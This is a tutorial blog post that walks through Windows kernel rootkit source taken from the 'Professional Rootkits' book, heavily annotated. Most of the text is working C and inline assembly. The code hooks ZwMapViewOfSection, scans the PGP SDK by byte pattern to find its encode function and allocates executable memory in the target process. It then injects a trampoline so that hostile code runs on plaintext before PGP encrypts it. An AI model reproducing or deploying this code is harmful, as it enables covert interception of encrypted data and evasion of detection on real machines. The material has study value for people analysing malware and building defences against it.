Usage of API hooking for code injection 

One method of code injection is using API hooking! In this approach a kernel api like ZwMapViewOfSection (which is responsible of loading dlls) is first hooked and then in the hooking version we can easily hook Dynamic Link Library functions. By hooking ZwMapViewOfSection we can detect when a function in a dll is needed by a process and then initiate the code injection process i.e. we overwrite the original function so that our codes are run before or after the hooked function.

Code injection algorithm

Our methodology is simple even though it is full of details. The algorithm is:

  • Copy the dynamic link library in user memory process
  • Find address of desired function to hook in user process memory
  • Allocate space in user memory process
  • Write our functions – which is going to replace the hooked function- and other needed data to this space
  • Find the first instruction of hooked function
  • Replace it with a jump to our function
  • Copy the first instruction and a return Jump (back to the hooked function) in our hooking function

The picture below shows the concept:

User Mode hooks | before and after code injection

                       Figure 4-2(from Professional rootkits book)

You should have a solid background in OS and x86 platform to understand some of the logics behind the api hooking. For example we need to allocate some space in the process asking for the hooked function (to be mapped by its dll) because pointing to a code in other locations than the process’s memory is not allowed and the process itself already uses all of its memory. Thus we need to allocate memory there so we will be able to copy our own code replacing hooked function.

The trampoline is actually the beginning of our hook. And the first instruction of the hooked function is the entry to it which we should overwrite it! But what happens to this instruction? Well we copy this instruction to the allocated memory and then when we want to pass the control flow to the hooked function we execute this instruction.

Design concerns for api hooking and Code injection

Before jumping to the code you should ask these questions from yourself and look for answers in the c++ source codes below.

How we locate a dynamic library function?

Name of a function is supposed to become an address in opcodes so how can we search for a name in a bunch of opcodes in memory?

The hooked function has some parameters and to run our custom code we may need the parameters, how can we access them?

What do we need to inject to change the execution control to our injected code or trampoline function?

How can we find the address of our injected code or trampoline function so we put that address for the jump?

Carefully pay attention to the difference between the address of codes in our example of rootkits and their addresses in the caller process. For example we write the new hooking function in our rootkit example so then we put a copy of that in the running process. Therefore the written code in the rootkit is not supposed to be run explicitly.

How do we know what’s the first instruction of the hooked function?

How can we handle changing execution control flow to the POST-Hook (after running the original hooked function)?

What should the POST-HOOK do so the calling process of the hooked function does not detect any issues?

What we can we do in our custom hook injected code?

 

Api hooking

Ok we start from the ZwMapViewOfSection hooked kernel function (refer to the kernel hooks to see how it is done). All the codes are from “Professional rootkits by Ric Vieler”  book but they are heavily commented and I try to explain vague lines.

// Process Inject Dynamic Link Libraries

NTSTATUS NewZwMapViewOfSection(

    IN HANDLE SectionHandle,

    IN HANDLE ProcessHandle,

    IN OUT PVOID *BaseAddress,

    IN ULONG ZeroBits,

    IN ULONG CommitSize,

    IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,

    IN OUT PSIZE_T ViewSize,

    IN SECTION_INHERIT InheritDisposition,

    IN ULONG AllocationType,

    IN ULONG Protect )

{

            NTSTATUS status;

 

            // First complete the standard mapping process

            status = OldZwMapViewOfSection(    SectionHandle, //To see what a section is refer to https://msdn.microsoft.com/en-us/library/windows/hardware/ff563684(v=vs.85).aspx . Briefly Section Object is a memory section that can be shared(drivers want to make a shared memory for calling process)

                                                            ProcessHandle,

                                                            BaseAddress,

                                                            ZeroBits,

                                                            CommitSize,

                                                            SectionOffset OPTIONAL,

                                                            ViewSize,

                                                            InheritDisposition,

                                                            AllocationType,

                                                            Protect );

 

            // Now remap as required ( imageOffset only known for versions 4 & 5 )

            if( NT_SUCCESS( status ) && ( majorVersion == 4 || majorVersion == 5 ) )

            {

                        unsigned int     imageOffset = 0;

                        VOID*                         pSection = NULL;

                        unsigned int     imageSection = FALSE;

                        HANDLE                                 hRoot = NULL;

                        PUNICODE_STRING objectName = NULL;

                        PVOID                         pImageBase = NULL;

                        UNICODE_STRING    library1 = { 0 };

                        UNICODE_STRING    library2 = { 0 };

                        CALL_DATA_STRUCT          callData[TOTAL_HOOKS] = { 0 };

                        int                                                        hooks2inject = 0;

                       

                        // Image location higher in version 4

                        if( majorVersion == 4 )

                                    imageOffset = 24;

 

                        if( ObReferenceObjectByHandle(       SectionHandle, //this function assures that you can access this object in the calling process but here it ensures that the handle will not be closed and give us a pointer to the section. Here is a list of Object Hnadles: https://msdn.microsoft.com/en-us/library/windows/hardware/ff557758(v=vs.85).aspx

                                                                                                                        SECTION_MAP_EXECUTE,

                                                                                                                        *MmSectionObjectType,// i killed myself but i couldn't find structure of MmSectionObjectType

                                                                                                                        KernelMode,

                                                                                                                        &pSection,

                                                                                                                        NULL ) == STATUS_SUCCESS )

                        {

                                    // Check to see if this is an image section

                                    // If it is, get the root handle and the object name

                                    _asm

                                    {

                                                mov     edx, pSection

                                                mov     eax, [edx+14h] // this line fetches the psection + 20 bytes

                                                add     eax, imageOffset //apprantly it is also an address ( image_base=[psection + 20] ) . so now it calculates images_base + 24

                                                mov     edx, [eax] // now it fetches image=[images_base + 24]

                                                test    byte ptr [edx+20h], 20h // now it fetches first byte of [image +32] and and it by 00100000

                                                jz      not_image_section //if 6 bit of [image +32] byte is not 1 then it is not an image section

                                                mov     imageSection, TRUE

                                                mov     eax, [edx+24h] //it fetchesh [image+36] -- could be 9 field--

                                                mov     edx, [eax+4] //module Handle

                                                mov     hRoot, edx

                                                add     eax, 30h // "the 9th field"->"48 byte"

                                                mov     objectName, eax

                                                not_image_section:

 

                                    }

                                    if( BaseAddress )

                                                pImageBase = *BaseAddress;

 

                                    // Mapping a DLL

                                    if( imageSection && pImageBase && objectName && objectName->Length > 0 )

                                    {

                                                // define libraries of interest

                                                RtlInitUnicodeString( &library1, L"kernel32.dll" ); //just copy the string as unicode

                                                RtlInitUnicodeString( &library2, L"PGPsdk.dll" );

 

                                                if ( IsSameFile( &library1, objectName ) ) // kernel32 note: boject name contains the full path

                                                {

                                                            kernel32Base = pImageBase;

                                                }

                                                else if ( IsSameFile( &library2, objectName ) ) // PGPsdk

                                                {

                                                            // Pattern for PGP 9.0 Encode

                                                            BYTE pattern1[] = {    0x55, 0x8B, 0xEC, 0x83, 0xE4, 0xF8, 0x81, 0xEC, \

                                                                                                                        0xFC, 0x00, 0x00, 0x00, 0x53, 0x33, 0xC0, 0x56, \

                                                                                                                        0x57, 0xB9, 0x26, 0x00, 0x00, 0x00, 0x8D, 0x7C, \

                                                                                                                        0x24, 0x18, 0xF3, 0xAB };

 

                                                            PVOID pfEncode = GetFunctionAddress( pImageBase, NULL, pattern1, sizeof(pattern1) ); // checks the whole segment starting at pImageBase to see the  opcodes of pattern[]

 

                                                            if( !pfEncode )

                                                            {

                                                            // Pattern for PGP 9.5 Encode

                                                                        BYTE pattern2[] = {    0x81, 0xEC, 0xFC, 0x00, 0x00, 0x00, 0x53, 0x55, \

                                                                                                                                    0x33, 0xDB, 0x68, 0x98, 0x00, 0x00, 0x00, 0x8D, \

                                                                                                                                    0x44, 0x24, 0x14, 0x53, 0x50, 0x89, 0x9C, 0x24, \

                                                                                                                                    0xB4, 0x00, 0x00, 0x00 };

 

                                                                        pfEncode = GetFunctionAddress( pImageBase, NULL, pattern2, sizeof(pattern2) );

                                                            }

 

                                                            if( pfEncode )

                                                            {

                                                                        hooks2inject = 1; // no just one hook but we can make as many hooks as we want by setting the callData array elements

                                                                        callData[0].index = USERHOOK_beforeEncode;

                                                                        callData[0].hookFunction = pfEncode;

                                                                        callData[0].parameters = 2;

                                                                        callData[0].callType = CDECL_TYPE;

                                                                        callData[0].stackOffset = 0;

                                                                        DbgPrint("comint32: NewZwMapViewOfSection pfEncode = %x",pfEncode);

                                                            }

                                                            else

                                                            {

                                                                        DbgPrint("comint32:  PGP Encode not found.");

                                                            }

                                                }

                                                if( hooks2inject > 0 ) //only if we found one function to hook and by now just Encode function

                                                {

                                                            PCHAR injectedMemory;

 

                                                            // prepare memory

                                                            injectedMemory = allocateUserMemory(); // allocate memory in process area

                                                            // inject

                                                            if( !processInject( (CALL_DATA_STRUCT*)&callData, hooks2inject, injectedMemory ) ) // copy code and data to injectedMemory and place hooks in function

                                                            {

                                                                        DbgPrint("comint32: processInject failed!\n" );

                                                            }

                                                }

                                    }

                                    ObDereferenceObject( pSection );

                        }

            }

            return status;

}

 

First in line 33 we run the original ZwMapViewOfSection to map the requested library. Then in line 91 we map the returned view (dll, file, shared buffer or etc.). As you might have expected it is not easy to find a function to be hooked in memory. The first step is to know when the desired library (containing the function to be hooked) is called by a process. Unfortunately structures that help us to do that are undocumented and we must dig memory to find some useful data. All we know is that the first “out parameter of ZwMapViewOfSection” (psection) sometimes refers to a dll and if 6th bit of (DLL=[[[psection + 20]+24]+32]), [] means dereferencing a pointer, is 1 then it is a dll and [[DLL+36]+4] is the module handle and [[DLL+36]+48] is dll name. These were the logic for assembly codes from line 109 to 141. After that in line 171 if the dll name is what we expect we can start looking for the hooked function from the start of the dll (either by its opcodes or the function’s name in GetFunctionAddress). For code injection we need to copy our code in the caller process's memory of the dll. We need to allocate some memory in the caller process so we can inject our code. Line 253 does that allocation and returns the base address of the allocated memory. After finding the function’s address we inject our custom codes using processInject in line 257.

In the preceding codes you saw a lot of codes to handle things that in user land you take them as granted but here in kernel programming you should write a function to compare two strings or manage every move in memory. IsSameFile, IsSameString and checkPattern are just helper functions to compare strings or bytes:

// This should be fast!

int checkPattern( unsigned char* pattern1, unsigned char* pattern2, size_t size )

{

            register unsigned char* p1 = pattern1;

            register unsigned char* p2 = pattern2;

            while( size-- > 0 )

    {

                        if( *p1++ != *p2++ )

                                    return 1;

            }

            return 0;

}

 

// Used to compare a full path to a file name(after the last \)

BOOL IsSameFile(PUNICODE_STRING shortString, PUNICODE_STRING longString)

{

            USHORT index;

            USHORT longLen;

            USHORT shortLen;

            USHORT count;

 

            index = longString->Length / 2; // wchar_t len is length / 2

 

            // search backwards for backslash

            while( --index )

                        if ( longString->Buffer[index] == L'\\' )

                                    break;

 

            // check for same length first

            longLen = (longString->Length / 2) - index - 1; //size just after the last \

            shortLen = shortString->Length / 2;

            if( shortLen != longLen )

                        return FALSE;

 

            // Compare

            count = 0;

            while ( count < longLen )

                        if ( longString->Buffer[++index] != shortString->Buffer[count++] )

                                    return FALSE;

 

            // Match!

            return TRUE;

}

 

// Compare to char strings

BOOL IsSameString( char* first, char* second )

{

            while( *first && *second )

            {

                        if( tolower( *first ) != tolower( *second ) )

                                    return FALSE;

                        first++;

                        second++;

            }

            if( *first || *second ) // if both string does not end

                        return FALSE;

 

            // strings match!

            return TRUE;

}

 

In kernel programming to avoid a page fault you should be sure that the referenced memory is mapped. That’s the reason you first map the returned reference of ZwMapViewOfSection and make sure that it is not being thrown out of memory. We have a couple of other functions to map memory, you can see the source code of FreeKernelAddress and MapKernelAddress here:

// Map user address space into the kernel

PVOID MapKernelAddress( PVOID pAddress, PMDL* ppMDL, ULONG size ) //in fact returns the base address at system which pAddress is part of it

{

            PVOID pMappedAddr = NULL;

           

            *ppMDL = IoAllocateMdl( pAddress, size, FALSE, FALSE, NULL ); //return a Memory Descriptor List to the pAddress of size length

            if( *ppMDL == NULL )

                        return NULL;

 

            __try

            {

                        MmProbeAndLockPages( *ppMDL, KernelMode ,IoReadAccess );

            }

            __except( EXCEPTION_EXECUTE_HANDLER )

            {

                        IoFreeMdl( *ppMDL );

                        *ppMDL = NULL;

                        return NULL;

            }

 

            pMappedAddr = MmGetSystemAddressForMdlSafe( *ppMDL, HighPagePriority ); //MmGetSystemAddressForMdlSafe returns the base system-space virtual address that maps the physical pages that the specified MDL describes. If the pages are not already mapped to system address space and the attempt to map them fails, NULL is returned.

            if( !pMappedAddr )

            {

                        MmUnlockPages( *ppMDL );

                        IoFreeMdl( *ppMDL );

                        *ppMDL = NULL;

                        return NULL;

            }

 

            return pMappedAddr;

}

 

// Free kernel space after mapping in user memory

VOID FreeKernelAddress( PVOID* ppMappedAddr, PMDL* ppMDL )

{

            if( *ppMappedAddr && *ppMDL )

                        MmUnmapLockedPages( *ppMappedAddr, *ppMDL );

 

            *ppMappedAddr = NULL;

            if( *ppMDL )

            {

                        MmUnlockPages( *ppMDL );

                        IoFreeMdl( *ppMDL );

            }

            *ppMDL = NULL;

}

 

In addition to these useful helpers, GetFunctionAddress is an important function which finds the address of function to be hooked. It does that by digging into a dll. A dll has a header which it is PIMAGE_DOS_HEADER struct. You can see its structure in Figure 1. PIMAGE_DOS_HEADER has the e_lfanew field which it points to a PIMAGE_NT_HEADER (Figure 2) and PIMAGE_NT_HEADER has a virtual address field which points to a PIMAGE_EXPORT_DIRECTORY structure (Figure 3). PIMAGE_EXPORT_DIRECTORY has several arrays that the names of functions and their addresses are in there. Locating a function by its name is done using this structure in a dll header.

Pimage_Dos_Header structure for code injection

Figure 1 (PIMAGE_DOS_HEADER)

PIMAGE_NT_HEADER for code injection

Figure 2 (PIMAGE_NT_HEADER)

PIMAGE_EXPORT_DIRECTORY structure for code injection

Figure 3 (PIMAGE_EXPORT_DIRECTORY)

Below is the code of GetFunctionAddress:

// Get the address of a function from a DLL

// Pass in the base address of the DLL

// Pass function name OR pattern and pettern length

PVOID GetFunctionAddress(  PVOID BaseAddress,

                                                                                    char* functionName,

                                                                                    PBYTE pattern,

                                                                                    size_t patternLength  )

{

    ULONG imageSize;

    ULONG virtualAddress;

    PVOID returnAddress;

    PULONG functionAddressArray;

    PWORD ordinalArray;

    PULONG functionNameArray;

    ULONG loop;

    ULONG ordinal;

            PVOID mappedBase;

            PMDL pMDL;

            BYTE* bytePtr;

            BYTE* maxBytePtr;

    PIMAGE_DOS_HEADER pDOSHeader;

    PIMAGE_NT_HEADER pNTHeader;

    PIMAGE_EXPORT_DIRECTORY exportDirectory;

 

            imageSize = GetImageSize( BaseAddress ); //to get the size of dll

            mappedBase = MapKernelAddress( BaseAddress, &pMDL, imageSize ); // mapping baseAddress with imageSize, the reason of mapping is explained in GetImageSize

 

            if ( functionName == NULL )

            {

                        // Search for function pattern

                        returnAddress = 0;

                        maxBytePtr = (PBYTE)((DWORD)mappedBase + (DWORD)imageSize - (DWORD)patternLength);

                        for( bytePtr = (PBYTE)mappedBase; bytePtr < maxBytePtr; bytePtr++ )

                        {         

                                    if( checkPattern( bytePtr, pattern, patternLength ) == 0 )

                                    {

                                                returnAddress = (PVOID)((DWORD)BaseAddress + (DWORD)bytePtr - (DWORD)mappedBase); // it actually finds the bytePtr that is address of function in the kernel so to find it in user process space we must subtract it from mappedBase and add it to user address space

                                                break;

                                    }

                        }

                        if( mappedBase )

                                    FreeKernelAddress( &mappedBase, &pMDL );

                        return returnAddress;

            }

           

            // Search for function name

    pDOSHeader = (PIMAGE_DOS_HEADER)mappedBase;

    pNTHeader = (PIMAGE_NT_HEADER)((PCHAR)mappedBase + pDOSHeader->e_lfanew);

    imageSize = pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size; //IMAGE_DIRECTORY_ENTRY_EXPORT is an index which is defined by kernel and is equal to 0. this line in fact gets the number of functions exported

    virtualAddress = pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; //this line gets the address of PIMAGE_EXPORT_DIRECTORY

    exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PCHAR)mappedBase + virtualAddress); // to see the structure refer to image file(the gif one)

    functionAddressArray = (PULONG)((PCHAR)mappedBase + exportDirectory->AddressOfFunctions); // an array containing address of exported functions

    ordinalArray  = (PWORD)((PCHAR)mappedBase + exportDirectory->AddressOfNameOrdinals); // and array which its element contain index to AddressOfFunctions. suppose you have the name X. you should first find the X name in AddressOfNames and then use index of that name in array to find its currosponding value in the ordinal. the value is index of function in AddressOfFunctions

    functionNameArray     = (PULONG)((PCHAR)mappedBase + exportDirectory->AddressOfNames);

 

            ordinal = (ULONG)functionName;

    if (!ordinal)

            {

                        if( mappedBase )

                                    FreeKernelAddress( &mappedBase, &pMDL );

                        return 0;

            }

    if( ordinal <= exportDirectory->NumberOfFunctions ) // this is just the function capability to also resolve based on ordinal value

    {

                        if( mappedBase )

                                    FreeKernelAddress( &mappedBase, &pMDL );

        return (PVOID)((PCHAR)BaseAddress + functionAddressArray[ordinal - 1]);

    }

 

    for( loop = 0; loop < exportDirectory->NumberOfNames; loop++ )

    {

                        ordinal = ordinalArray[loop];

                        if( functionAddressArray[ordinal] < virtualAddress || functionAddressArray[ordinal] >= virtualAddress + imageSize ) // check to control that function address is not in PIMAGE_EXPORT_DIRECTORY teritory

        {

            if( IsSameString( (PSTR)((PCHAR)mappedBase + functionNameArray[loop]), functionName ) ) //((PCHAR)mappedBase + functionNameArray[loop]) makes the pointer to the name of function ### Probably in Exe itself there is not need to make this addition because it is relative address but since we mirizim kerm it's needed ###

            {

                                                returnAddress = (PVOID)functionAddressArray[ordinal];

                                                if( mappedBase )

                                                            FreeKernelAddress( &mappedBase, &pMDL );

                return (PVOID)((DWORD)BaseAddress + (DWORD)returnAddress); //functionAddressArray[ordinal] is added to BaseAddress since we want the function location in process

            }

        }

    }

 

            DbgPrint("comint32: EXPORT NOT FOUND, function = %s", functionName);

           

            if( mappedBase )

                        FreeKernelAddress( &mappedBase, &pMDL );

            return 0;

}

 

To allocate memory for our injected code we used AllocateUserMemory, here is the source code:

 

PCHAR allocateUserMemory()
{
LONG memorySize;
LONG tableSize;
LONG codeSize;
LONG dataSize;
ULONG buffer[2];
NTSTATUS status;
PCHAR pMemory;
IN_PROCESS_DATA* pData;

 

// Calculate sizes
// tableSize = (DetourFunction - HookTable) * TOTAL_HOOKS
// codeSize = EndOfInjectedCode - DetourFunction
// dataSize = sizof( IN_PROCESS_DATA )
__asm
{
lea eax, HookTable
lea ebx, DetourFunction
lea ecx, EndOfInjectedCode
mov edx, ebx
sub edx, eax
mov tableSize, edx
mov edx, ecx
sub edx, ebx
mov codeSize, edx
}
tableSize = tableSize * TOTAL_HOOKS;
dataSize = sizeof( IN_PROCESS_DATA );
memorySize = tableSize + codeSize + dataSize; //whole size to be allocated in process area

 

// Allocate memory
buffer[0] = 0;
buffer[1] = memorySize;
//Remember that the process called ZwMapViewOfSection and we hooked that function, and the code here is called from the process calling that function. This means by passing current process we allocate memory in process's area
status = ZwAllocateVirtualMemory( (HANDLE)-1, (PVOID*)buffer, 0, &buffer[1], MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ); // (HANDLE) -1 : means casting -1 to HANDLE and -1 means current process, buffer : is base address of allocated memory, &buffer[1]: the size of page to be allocated, and in return the actual size allocated
pMemory = (PCHAR)(buffer[0]); // the base address of allocated page

 

if( !NT_SUCCESS( status ) || !pMemory )
return NULL;

 

// initialize memory
memset( pMemory, 0x90, tableSize + codeSize ); // set no-op at start to end of code
pData = (IN_PROCESS_DATA*)(pMemory + tableSize + codeSize );
memset( (PVOID)pData, 0, dataSize ); // set just zero in data section

return pMemory;
}

 

 

HookTable, DetourFunction and In_Process_Data are codes and data to be injected in the caller process. Don't worry you see their source codes in a minute but for now just be aware of the orders of these functions exactly as mentioned. All of the injected codes are between HookTable and DetourFunction. In_Process_Data is just an struct keeping the pointers to the kernel library functions.

Code injection

By code injection we change the first instruction of hooked function, to transfer control to our custom code, and copy our required codes.

In order to inject our codes we should know their destination addresses. When we allocate address we know the beginning address of allocated memory. That address is where we start to copy our codes. All of the codes to be copied are not for execution; we need to reserve some spaces so we can pass data from the execution of hooked kernel function to the userland hooked function (These data help the hooking function to know how to set the stack so no fault or exception arises). Moreover we need to save the original first instruction of hooked function. We also need to reserve some spaces for references to the library functions in OS. getHookPointers function help us to find the offset to mentioned places by adding the size of each section to the start of allocated memory and keeping track of the end of each section.

BOOL getHookPointers( PCHAR pMemory, PCHAR* pTable, PCHAR* pCode, PCHAR* pData ) //this function sets address of HookTable function in pTable and Detour function in pCode and IN_PROCESS_DATA in pData

{

            LONG  tableSize = 0;

            LONG  codeSize = 0;

            LONG  dataSize = 0;

 

            __asm

            {

                        lea eax, HookTable

                        lea ebx, DetourFunction

                        lea ecx, EndOfInjectedCode

                        mov edx, ebx

                        sub edx, eax

                        mov tableSize, edx

                        mov edx, ecx

                        sub edx, ebx

                        mov codeSize, edx

            }

           

            tableSize = tableSize * TOTAL_HOOKS;

            dataSize = sizeof(IN_PROCESS_DATA);

            *pTable = pMemory;

            *pCode = *pTable + tableSize;

            *pData = *pCode + codeSize;

            return TRUE;

}

 

pTable is where the first modified instruction of function to be hooked is going to point. Also we keep the parameters from kernel and the original first instruction of hooked function there. After transferring the execution to the pTable, some initializations happen and then the execution goes to pCode. pData is where we save pointers to kernel library functions.

Here are the codes to be copied in pTable:

#define EMIT_FOUR( x ) __asm{ __asm _emit x __asm _emit x __asm _emit x __asm _emit x } // __asm _emit shows the x (like an opcode) directly

void __declspec(naked) HookTable( void )

{

            __asm //Pay attention to the usage of edx, it is never saved so it's initial value overwritten but no problem since nothing still have  been run!

            {

                        push eax //save ax value -- other registers are not saved since the only register will be using are ax and dx and dx is gonna be the parameter for the detour function

                        xor eax, eax

                        call phoney_call // calls next line because it wants to save the next line address (not effective address which can be get by lea instruction) on top of the stack (since call instruction saves the return address which is phoney call address)

phoney_call:

                        lea eax, phoney_call

                        lea edx, phoney_jump

                        sub edx, eax // it needs the (phoney_call - phoney_jump) value because then it will be added to the real address of phoney_call

                        pop eax // here the address of phoney_call is poped from the top of stack

                        add eax, edx //the REAL address of phoeny_jump is calculated

                        mov edx, eax //dx will be used by detuor function and it will not be modified till then since it will be called by a jump at next instruction

                        pop eax // the eax value which was saved is now restored

                        jmp DetourFunction //This instruction should be modified because so far it points to the complied code's detour function but what we need is the address of detour's function in the caller process

phoney_jump:

                        EMIT_FOUR( 0xff ) // this instruction makes a 32 bit (since memory access is based on 4 bytes) value of -1 -- this value then will be examind by process inject to find the parameter data place--

                        EMIT_FOUR( 0x0 ) //the previous 4 bytes, this and following 2 bytes will be used to store the call-data structure that was passed to process-inject(they are needed to adjust the stack)

                        EMIT_FOUR( 0x0 )

                        EMIT_FOUR( 0x0 )

                        EMIT_FOUR( 0x90 ) // this no-op 4 bytes plus 8 next 4-bytes will be used to store first instruction and jmp to original function(no-op+jmp or normal-instruction +jmp to original function)

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        EMIT_FOUR( 0x90 )

                        jmp EndOfInjectedCode // it then will be replaced by a no-op

            }

}

 

__declspec(naked) means neither callee nor the caller are supposed to clean the stack. As I mentioned HookTable is where the initialization for the real code takes place. This function just calculates the real address that points to the parameters from kernel (our kernel hooked function) and then transfers control to the DetourFunction (where also pCode points to) where the real magic happens:

#define PUSH_STACKFRAME( ) __asm{ __asm push ebp __asm mov ebp, esp __asm sub esp, __LOCAL_SIZE __asm push edi __asm push esi __asm push ebx __asm pushfd } //we need it because some of our functions are naked so it's our duty to write prolouge

#define POP_STACKFRAME( ) __asm{ __asm popfd __asm pop ebx __asm pop esi __asm pop edi __asm mov esp, ebp __asm pop ebp } //because the end pop ebp the stack points to its value before the function

void __declspec(naked) DetourFunction( void ) // the __declspec(naked) means the prolouge size is fixed (in fact there is no prolouge and the prolouge will be manualy written)

{

            PUSH_STACKFRAME(); // save the ebp and then store the esp in ebp .... and save edi,esi,ebx and flags -- this is in fact the prolouge--

            {

                        DWORD                      hookIndex;

                        DWORD                      parameters;

                        DWORD                      callType;

                        DWORD                      stackOffset;

                        PCHAR                        trampolineFunction;

                        IN_PROCESS_DATA*            callData;

                        PCHAR                        codeStart;

                        PDWORD                    originalStack;

                        DWORD                      tempStack;

                        int                                loop;

                        int                                parameters4return;

                        DWORD                      parameter2return = 0;

                        DWORD                      continueFlag;

                        DWORD                      register_esp;

                        DWORD                      register_edi;

                        DWORD                      register_esi;

                        DWORD                      register_eax;

                        DWORD                      register_ebx;

                        DWORD                      register_ecx;

                        DWORD                      add2stack;

 

                        // setup to call injected functions

                        __asm

                        {

                                    mov register_esp, esp // this and following lines save the register values

                                    mov register_edi, edi

                                    mov register_esi, esi

                                    mov register_eax, eax

                                    mov register_ebx, ebx

                                    mov register_ecx, ecx

 

                                    // get parameters

                                    push edx // save edx because its value(the phoney_jump addres) is gonna be used more than once

                                    mov edx, [edx+CALLDATA_INDEX_LOCATION] //this is the address of the location which stores the INDEX parameter -- paased by process-inject -- . in fact it is the first 4 byte

                                    mov hookIndex, edx

                                    pop edx

                                    push edx

                                    mov edx, [edx+CALLDATA_PARAMETERS_LOCATION] // location of parameters value --like index-- . the second 4 bytes

                                    mov parameters, edx

                                    pop edx

                                    push edx

                                    mov edx, [edx+CALLDATA_CALLTYPE_LOCATION] // the call_type is either __declspec or other types

                                    mov callType, edx

                                    pop edx

                                    push edx

                                    mov edx, [edx+CALLDATA_STACK_OFFSET_LOCATION]

                                    mov stackOffset, edx

                                    pop edx

                                    push edx

                                    add edx, TRAMPOLINE_LOCATION // this is 16 bytes after phoney_jump, the first nop instruction (0x90 opcode)

                                    mov trampolineFunction, edx

                                    pop edx

                                    // caculate the start address

                                    xor eax, eax // zeros the eax register

                                    call called_without_return // like call to phoney_call to get the address on top of the stack

called_without_return:

                                    pop eax // address of the called_without_return is now in eax

                                    lea ebx, DetourFunction

                                    lea ecx, called_without_return

                                    sub ecx, ebx

                                    sub eax, ecx // in fact now eax has the value (called_without_return real address) - (called_without_return - DetourFunction) which is Detour Function

                                    mov codeStart, eax //codeStart points to detour_function start

                                    // data area

                                    lea ecx, EndOfInjectedCode

                                    sub ecx, ebx // ecx contains EndOfInjectedCode - DetourFunction

                                    add ecx, eax //End of EndOfInjectedCode address

                                    mov callData, ecx // callData now contains address of IN_PROCESS_DATA (In allocateUserMemory we allocated IN_PROCESS_DATA after HookTable(tableSize) and Detour Function(codeSize))

                                    // caculate the last ret address

                                    mov eax, ebp // ebp by PUSH_STACKFRAME macro got the original esp - 4 (subtracted by 4 because the ebp before storing esp was pushed)

                                    add eax, 4        // adding 4 means in fact pop (because x86 stack grows down) and now eax has the original esp

                                    add eax, stackOffset

                                    mov originalStack, eax // will be used to read parameters

                        }

 

                        // setup return call type

                        if( callType == CDECL_TYPE )

                                    add2stack = parameters * sizeof( DWORD ); // because the parameters are on top of stack

                        else

                                    add2stack = 0; // parameters are in registers not on stack

                        // call pre-injected code

                        continueFlag = BeforeOriginalFunction( hookIndex, originalStack, &parameter2return, callData ); //this function checks the function to be hooked and call right function in this case the before_encode

                        if( continueFlag == (DWORD)TRUE ) // !continueFlag means not interested in running the original hooked function but this is what actually happening

                        {

                                    for( loop = parameters; loop > 0; loop-- ) // this "for" aims to construct the parameters again on top of the stack: the parameters are after return address so it should read originalStack[1] and originalStack[2]

                                    {

                                                tempStack = originalStack[loop];

                                                __asm push tempStack

                                    }

                                    // Call trampoline (jumps to original function)

                                    //

                                    // Since trampoline is a jump, the return in

                                    // the original function will come back here.

                                    __asm

                                    {

                                                lea ebx, DetourFunction

                                                lea eax, return_from_trampoline

                                                sub eax, ebx

                                                add eax, codeStart // the address of return address which is return_from_trampoline now is on top of the stack

                                                // construct call

                                                push eax

                                                // adjust stack

                                                sub esp, stackOffset // actually nothing changes since the stackOffset is 0

                                                // restore registers and call

                                                mov edi, register_edi

                                                mov esi, register_esi

                                                mov eax, register_eax

                                                mov ebx, register_ebx

                                                mov ecx, register_ecx

                                                jmp trampolineFunction // now returning to the hooked function(by executing the first instruction and a jmp to the 2nd instruction) and after that the function goes back to next line since its address is on top of the stack

return_from_trampoline:

                                                add esp, add2stack //parameters which put on the stack now are poped

                                                mov parameter2return, eax //return value in parameter2return

                                    }

                                    // call post-injected code

                                    AfterOriginalFunction( hookIndex, originalStack, &parameter2return, callData ); //Do nothing for now, just to show the concept

                        }

                        // prepare to return

                        tempStack = *originalStack;

                        if( callType == CDECL_TYPE )

                                    parameters4return = 0; //

                        else

                                    parameters4return = parameters; // in case of multiple return value

                        __asm

                        {

                                    mov eax, parameter2return

                                    mov ecx, tempStack // on top of the original stack the return address to the caller function stored so no cx contain the return address

                                    mov edx, parameters4return

                                    shl edx, 2 // multiply by 4, size of a DWORD

                                    add edx, stackOffset

                                    POP_STACKFRAME(); // original stack

                                    add esp, 4 // the return address is now poped

                                    add esp, edx //stack is clear if callee should clean the stack ( !CDECL_TYPE )

                                    jmp ecx // jump to return address

                        }

                        __asm mov edx, trampolineFunction // i think it is junk

            }

            POP_STACKFRAME(); // i think it is junk

            __asm jmp edx // i think it is junk

}

 

What we do, should not interrupt the following execution mechanism so we should first save the registers and then restore their values. That is what happens in line 9. In line 77 to 105 we retrieve the passed parameters from kernel using the initialized address at HookTable. We also set the returned address from DetourFunction (the address we should return after doing our dirty work!) in line 109 to 115 by setting tramploineFunction variable. While executing our custom code we may need the parameters to the original hooked function. Parameters are on top of stack and we can access the stack because the execution control comes to our trampoline function by a jmp so stack is the same. In line 119 to 155 we setup the stack container variable to point to the original stack and the callData which contains references to the kernel library functions. After that we execute our custom code before execution of the hooked function in line 173. To execute a piece of code after the original hooked function we do much like what we do when exploiting a buffer overflow i.e. we place an EIP on the stack pointing to the post-hook function. In line 201 to 215 we place the address of our custom code to be run after the execution of hooked function on top of the stack. Afterwards we jump to the saved address in tramploineFunction in line 229 which is the first instruction of hooked function (after that instruction there is a jump back to the hooked function). After executing the original function the control flow transfers to the line 232 that depending on the implementation it appropriately clean the stack , place the parameter where the caller looks for it and etc

The execution flow after hooking the desired function is as in figure 4:

Rootkit source code execution flow 

Figure 4

In your injected code you can do pretty much everything as long as you copy the required library and API functions to the process’s memory. But here in our BeforeOriginalFunction we process the buffer before encryption and also return a value that based on that we decide to run the original hooked function or not:

///////////////////////////////////////////////////////////////

DWORD BeforeOriginalFunction( DWORD hookIndex, PDWORD originalStack, DWORD* returnParameter, IN_PROCESS_DATA* callData )

{

                if( hookIndex == USERHOOK_beforeEncode )

                {

                                return beforeEncode( originalStack, returnParameter, callData );

                }

                // can other hooks be here

                return (DWORD)TRUE;

}

 

// this function is located in the PGP SDK

